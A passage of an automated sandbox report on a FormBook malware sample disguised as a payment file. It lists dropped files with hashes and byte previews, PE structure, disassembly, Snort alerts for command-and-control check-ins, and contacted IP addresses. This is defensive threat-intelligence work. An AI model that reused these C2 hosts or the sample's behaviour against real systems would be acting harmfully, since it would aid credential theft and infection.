                                                                                                                      • 194.85.61.76
                                                                                                                      ShippingReport-NoticeofArrival.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      notabotnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 193.232.244.244
                                                                                                                      Payment advise.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 109.70.26.37

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\81EFaKSJ3

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):94208
                                                                                                                      Entropy (8bit):1.2882898331044472
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                      MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                      SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                      SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                      SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6222
                                                                                                                      Entropy (8bit):7.133693106224874
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Farc6oYwg/DrYu8k2XO5oSwQCahg5GwYTfOdaFxrsyGIi1GReZw7zmzuZP0ed:FarcRYkhX1S1CapwYmaFmyGIDCzzSL
                                                                                                                      MD5:933BE16F654BB3BC251347110454FB49
                                                                                                                      SHA1:A4580CC4A1D3AC955D648A9C34BBD27B5C48F9AE
                                                                                                                      SHA-256:5252B99D4CEB221CF6F0440F0F2430F7A76D1B6EAC6AB2997FB21828400B502E
                                                                                                                      SHA-512:845B3DA4F3AA844508AC7B0CE86253A2E588C994308D29EFB5385034CF38C413258820CB0C7C938F04E7B447549FE24076CD1EA327957AD70D200748BAAC942B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                                                                      C:\Users\user\AppData\Local\Temp\nsmF14F.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):288752
                                                                                                                      Entropy (8bit):7.703024922742189
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7iDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2br0xp1I:7iDsO7Myi+3nGdRa8Lyw57lO2brm
                                                                                                                      MD5:B770DC09825AC013742565DF7C5B0DF5
                                                                                                                      SHA1:8B0F5C52ABE0EB2310371254F051F63DD2841AF6
                                                                                                                      SHA-256:4A205CB23069324967DFE9615F25B7D8118D779979BFE22A8E366B02180AB140
                                                                                                                      SHA-512:87B160CBAFC2D042000A201802FAF88F5674C498624A9802D98BC0AF6B4386E8A54110ABB1CA769654259091C35511898A50CC82E759B02EEF32CB4D20BDA22A
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.-......,...................s...p........,.......-..............................................................................*...........................................................................................................................................................G...............%...j...........................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\qhcqh.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):59904
                                                                                                                      Entropy (8bit):6.225922782264242
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Rpbnyq696YM4+FJV/dRuDh96ir6VhAkAXuabEoK3r412IGXM5x8dsr:RpbRrYSJV/ToZr6VhhAXj7GnI15is
                                                                                                                      MD5:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      SHA1:E22976256F765E9B526728A2890D2A59FD535636
                                                                                                                      SHA-256:FE949C62767413F53307655AE55EFAD92454EAF28DC874F4650DDD74C79A7050
                                                                                                                      SHA-512:FC22103EB32998D76A3207EA789011E7633E3B7838DAD274C41930908E19F74905C101D9FABA58A3B8295248A94F38EF4932248DFCFD84D2A24D160335E8C48A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................1... ...6..............<...$...Rich...................PE..L...?..d.....................`....................@..........................0............@.................................d................................ .......................................................................................text............................... ..`.rdata...!......."..................@..@.data....,..........................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\tmjcdbgtyam.ggz

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):210904
                                                                                                                      Entropy (8bit):7.998936663875696
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:OiDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2l:OiDsO7Myi+3nGdRa8Lyw57lO2l
                                                                                                                      MD5:9E7E609FCC35E2BF40522D621CB62D4F
                                                                                                                      SHA1:17E126ADA88229FE6C42E2DAFEE0080C6643F345
                                                                                                                      SHA-256:0DD2596D144CACBA46ECD058E5CE2F13D27414313D8D33DADBDC455F3358B09A
                                                                                                                      SHA-512:68BEB80FE38D860FAAB5F40398B0EFC91A60A33946AE5D9A259007B35FF0F87D7C6DBD7EED662F0B21954F7656F1860D0029EE828A2EC8D062DF5D896F84BB42
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:....._0.a.!..@...7.?\n...8I~JK.O.|...@.W.>..=..{..*X......J..AWE...N>..J..6.Z..l..]S=7....k!.n...K..Z...1'.z 4h.....Y.........>bt@iReh.u..c..k.QY...}...9....>..62I.K.../b.....M..s.K9.......Il5k.g..J_......Y..o._\......[.....l.+.8....{..g..V..J...._0....t.k.4.~......$>=<.r.O..=.@..>E.=..{./*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..+(t.K9..Z..O.ml/}r..J_......&:/.U..f......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.886295753349112
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:OUTSTANDING_PAYMENT.exe
                                                                                                                      File size:297210
                                                                                                                      MD5:4832e17c1f6841aee2e1984a429ed946
                                                                                                                      SHA1:d7ad36c7bee5cb39aa5b77944ced8a716a8af545
                                                                                                                      SHA256:d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
                                                                                                                      SHA512:f7dbb5749ad23b13d001c55be2ba6e4b8deab56d0687804c8a61bddb98b723bd1a244c32507bb16b9544e092d7bf5a37480d6ff34944752dfe464d30ada7244e
                                                                                                                      SSDEEP:6144:qYa6cFVIKVgBgM6rpFh/U8KAg9gxt03ZaHJ1XoF5KOJeeqN3rj:qYa3fWg3TK8KRg4pCUGj
                                                                                                                      TLSH:615402D19350D1E6E8A706F00C35EA2712BF7E3D54705E4A3B9E71A97E73192822EE03
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                                                      File Icon

                                                                                                                      Icon Hash:517959587979b110

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x403640
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 000003F4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [ebp-14h], ebx
                                                                                                                      mov dword ptr [ebp-04h], 0040A230h
                                                                                                                      mov dword ptr [ebp-10h], ebx
                                                                                                                      call dword ptr [004080C8h]
                                                                                                                      mov esi, dword ptr [004080CCh]
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                                                                      mov dword ptr [ebp-28h], ebx
                                                                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FB070C04CCAh
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                                                                      not eax
                                                                                                                      and eax, ecx
                                                                                                                      mov word ptr [ebp-2Ch], ax
                                                                                                                      cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                      jnc 00007FB070C04C9Ah
                                                                                                                      and word ptr [ebp-00000132h], 0000h
                                                                                                                      mov eax, dword ptr [ebp-00000134h]
                                                                                                                      movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                      mov dword ptr [0042A318h], eax
                                                                                                                      xor eax, eax
                                                                                                                      mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                      movzx eax, ax
                                                                                                                      or eax, ecx
                                                                                                                      xor ecx, ecx
                                                                                                                      mov ch, byte ptr [ebp-2Ch]
                                                                                                                      movzx ecx, cx
                                                                                                                      shl eax, 10h
                                                                                                                      or eax, ecx

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x4510.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x3b0000x45100x4600False0.4218191964285714data5.130936129573036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                      RT_ICON0x3b2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_ICON0x3d7e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_ICON0x3e8880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_DIALOG0x3ecf00x100dataEnglishUnited States
                                                                                                                      RT_DIALOG0x3edf00x11cdataEnglishUnited States
                                                                                                                      RT_DIALOG0x3ef100x60dataEnglishUnited States
                                                                                                                      RT_GROUP_ICON0x3ef700x30dataEnglishUnited States
                                                                                                                      RT_VERSION0x3efa00x22cdataEnglishUnited States
                                                                                                                      RT_MANIFEST0x3f1d00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Snort IDS Alerts

                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                      192.168.2.3185.151.30.18149711802031453 03/20/23-09:09:32.876293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181
                                                                                                                      192.168.2.3192.64.116.16249717802031449 03/20/23-09:09:54.051496TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.35.181.216.14149705802031449 03/20/23-09:09:09.878629TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3192.64.116.16249717802031412 03/20/23-09:09:54.051496TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.35.181.216.14149705802031453 03/20/23-09:09:09.878629TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3192.64.116.16249717802031453 03/20/23-09:09:54.051496TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.3185.151.30.18149711802031449 03/20/23-09:09:32.876293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181
                                                                                                                      192.168.2.38.8.8.851139532023883 03/20/23-09:09:48.362224UDP2023883ET DNS Query to a *.top domain - Likely Hostile5113953192.168.2.38.8.8.8
                                                                                                                      192.168.2.35.181.216.14149705802031412 03/20/23-09:09:09.878629TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3185.151.30.18149711802031412 03/20/23-09:09:32.876293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 20, 2023 09:08:23.239229918 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.258771896 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.258922100 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.259864092 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.280504942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.462835073 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466599941 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466635942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466769934 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466814995 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466965914 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.476100922 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.476188898 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.486416101 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.718719006 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.860883951 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.861018896 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.861186028 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:34.004131079 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004220963 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004365921 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:35.370201111 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.387404919 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.529535055 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.529732943 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.530070066 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.673634052 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.673666954 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678245068 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678307056 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678327084 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678345919 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678364992 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678384066 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678401947 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678421021 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678453922 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678473949 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678502083 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.678550959 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:38.041094065 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.057307005 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198124886 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.198402882 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198573112 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.338808060 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338846922 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338994026 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.339560032 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.479263067 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:52.197664976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.183217049 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.350596905 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.350929976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.351131916 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518073082 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518115997 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518137932 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518275976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518762112 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518836021 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:56.855484962 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:57.871778011 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.037409067 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.037661076 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.038130045 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.202923059 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.202984095 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203006983 CET80497045.181.216.141192.168.2.3
